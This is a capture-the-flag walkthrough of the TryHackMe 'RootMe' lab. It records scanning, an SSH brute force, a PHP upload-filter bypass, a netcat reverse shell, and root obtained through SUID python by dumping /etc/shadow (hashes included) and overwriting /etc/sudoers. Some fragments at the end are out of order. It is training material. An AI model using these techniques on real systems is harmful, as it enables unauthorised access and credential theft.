rootme
https://tryhackme.com/room/rrootme
Last updated
Was this helpful?
https://tryhackme.com/room/rrootme
Last updated
Was this helpful?
nmap -sn -v 10.10.52.28 -oG - | awk '/Up$/{print $2}' >> livehosts.txt && nmap -v -A -iL livehosts.txt >> nmapscans.txt
This script I wrote scans the host (or subnets if applied) and puts the IP(s) into a txt file that have responded and are up. Nmap takes that file and scans the hosts that are running, putting those results into a different txt (This script is very helpful when scanning a network as apposed to a single machine, but I still like to use it).
Once I have established a good baseline of what is running and open on the target, I will start another scan to look for vulnerabilites on that machine while I check out the rest of the open ports.
nmap -v -sV --script vulners 10.10.52.28 > vulnscan.txt
In this case, port 22 and 80 and running. There is a webpage for 10.10.52.28, but nothing to interact with for this index.
I tried running a directory attack using dirb, with no luck. I stopped it after about 10 minutes to switch to this
gobuster dir -u http://10.10.52.28 -w /usr/share/wordlists/dirb/common.txt
which resulted in a much faster and successful outcome. With this, I can gravitate toward the status 301 results.
/.hta (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/index.php (Status: 200) [Size: 616]
/server-status (Status: 403) [Size: 276]
This has a lot of potential, but while I try to exploit this, I ran a bruteforce on the SSH port in the event I may be able to discover an existing username and password
hydra -L /usr/share/metasploit-framework/data/wordlists/namelist.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.52.28 -v -F -t 4
While this runs in the background, I began to think of the kind of files I can upload.
I started by creating a php file called cmd.php
The server responding with a message saying PHP is prohibited.
I uploaded the same file but with name cmd.php.jpg and this uploaded successfully. I am unable to execute the code with that extension so my next step is to figure out if there are other valid extension that will allow PHP to run.
It worked! Next step is to test commands.
Next step is to try and run some scripts. I first encoded this cd …/…/…/ && ls
This was a lot of info, so to simplify, I ran
This output all of the users for the server. This may come in handy for the SSH bruteforce but we can still maybe exploit the server more through this file upload. Maybe a PHP reverse shell?
Before trying that, I stopped my SSH bruteforce and changed the script to a valid username
hydra -l rootme -P /usr/share/wordlists/rockyou.txt ssh://10.10.52.28 -v -F -t 4
Again, I am going to let this run while I explore more options.
The last thing I wanted to try with the URL cmd’s was to find who the sudo users are
Now to create a reverse shell. I was able to make a new phtml file embedded with pentest monkey’s PHP reverse shell, uploading it to the site from the panel page and then running this script before running the file from the browser
ufw allow from 10.10.10.28 proto tcp to any port 1234 && nc -lnvp 4334
It worked!
listening on [any] 4334 … connect to [10.2.12.19] from (UNKNOWN) [10.10.52.28] 52082 Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 21:33:01 up 1:41, 0 users, load average: 0.00, 0.01, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can’t access tty; job control turned off
$ whoamiwww-data
Now comes the hard part. This is my first time being stuck as the www user. We have no sudo privileges. After some researching, I came across a possibility of an SUID escalation. To see the files with SUID permissions, I ran this:
$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount
find / -perm -u=s -type f 2>/dev/null | sed -e 's/snap\/core//g;s/\/9//g;s/\/6//;s/bin//;s/\/8//g' | awk -F "/" '{print$3,$4,$5}' | sed -e 's/usr//;s/lib//g' | sort
Python seems to be the only match to have SUID privileges. I loaded a shell using Python
$ whoami
www-data
$ su rootme
su: must be run from a terminal
$ python -c 'import os; os.system("/bin/sh")'
Same outcome as the reverse PHP shell. Still stuck as the www user for now.
whoamiwww-dataiduid=33(www-data) gid=33(www-data) groups=33(www-data)susu: must be run from a terminalsu rootmesu: must be run from a terminal
python -c 'import sys; print "\n".join(sys.path)'
/usr/lib/python2.7 /usr/lib/python2.7/plat-x86_64-linux-gnu /usr/lib/python2.7/lib-tk /usr/lib/python2.7/lib-old /usr/lib/python2.7/lib-dynload /usr/local/lib/python2.7/dist-packages /usr/lib/python2.7/dist-packages
After trying what felt like everything, I was finally able to get access to the shadow file using this python script
python -c 'print(open("/etc/shadow").read())'
root:$6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1:18478:0:99999:7::: daemon::18295:0:99999:7::: bin::18295:0:99999:7::: sys::18295:0:99999:7::: sync::18295:0:99999:7::: games::18295:0:99999:7::: man::18295:0:99999:7::: lp::18295:0:99999:7::: mail::18295:0:99999:7::: news::18295:0:99999:7::: uucp::18295:0:99999:7::: proxy::18295:0:99999:7::: www-data::18295:0:99999:7::: backup::18295:0:99999:7::: list::18295:0:99999:7::: irc::18295:0:99999:7::: gnats::18295:0:99999:7::: nobody::18295:0:99999:7::: systemd-network::18295:0:99999:7::: systemd-resolve::18295:0:99999:7::: syslog::18295:0:99999:7::: messagebus::18295:0:99999:7::: _apt::18295:0:99999:7::: lxd::18295:0:99999:7::: uuidd::18295:0:99999:7::: dnsmasq::18295:0:99999:7::: landscape::18295:0:99999:7::: pollinate::18295:0:99999:7::: rootme:$6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.:18478:0:99999:7::: sshd::18478:0:99999:7::: test:$6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0:18478:0:99999:7:::
python -c 'print(open("/etc/shadow").read())' | cat /etc/shadow | awk -F ":" '{print$1,$2}' | sed -n '/*/!p;/!/!p' > hashes
ls
hashes
cat hashes
sed 's/ /:/g' hashes > userhash
cat userhash
I got the password hashes! I thought this was going to be smooth sailing from here, but I thought wrong. I tried using john the ripper to crack any of the 3 password hashes I collected, but still no luck.
I thought back to what I had done to even get that information in the first place. I used python to open a file, what’s stopping me from writing to one??
python -c 'open("/etc/sudoers","w+").write("www-data ALL=(ALL) NOPASSWD:ALL")'
sudo -i
mesg: ttyname failed: Inappropriate ioctl for device
su
whoami
root
passwd www-data
Enter new UNIX password: test
Retype new UNIX password: test
passwd: password updated successfully
I finally moved up a user! The PHP shell we are still operating from is limited to certain commands, so I wanted to try my best to get an SSH login with my www user, but kept getting kicked out after logging in.
Oh well. Going back to the PHP shell, I located the user.txt file in /var/www
Lastly, I needed to locate the root.txt file
pwd
/root
ls
root.txt
cat root.txt
/css (Status: 301) [Size: 308] [–> ]
/js (Status: 301) [Size: 307] [–> ]
/panel (Status: 301) [Size: 310] [–> ]
/uploads (Status: 301) [Size: 312] [–> ]
Browsing to brings me to a page where I can upload files. I tested this out with a random txt file from my machine. I uploaded it and changed my URL to which showed me an index of the files in that folder.
I changed the name to cmd.phtml, uploaded, visited the url and was greeted with a blank page.
using the list output from the last command, I cross referenced the list here . To make it a little easier to cross reference, I spent way too long sorting the information by creating this script that puts the files I need to read MOSTLY in alphabetical order
Referencing it seems there may be a possibility of hijacking a library. This seems promising, but only if we discover some cron jobs ran by root a file or folder that we can write to for the python library.
root㉿kali)-[/home/kali/rootme]
└─# ssh www-data@10.10.52.28 -p 22
's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
System information as of Wed Aug 31 00:06:05 UTC 2022
System load: 0.11 Processes: 115
Usage of /: 20.5% of 19.56GB Users logged in: 0
Memory usage: 44% IP address for eth0: 10.10.52.28
Swap usage: 0%
Last login: Wed Aug 31 00:05:41 2022 from 10.2.12.19
This account is currently not available.
Connection to 10.10.52.28 closed.
┌──(root㉿kali)-[/home/kali/rootme]
└─#
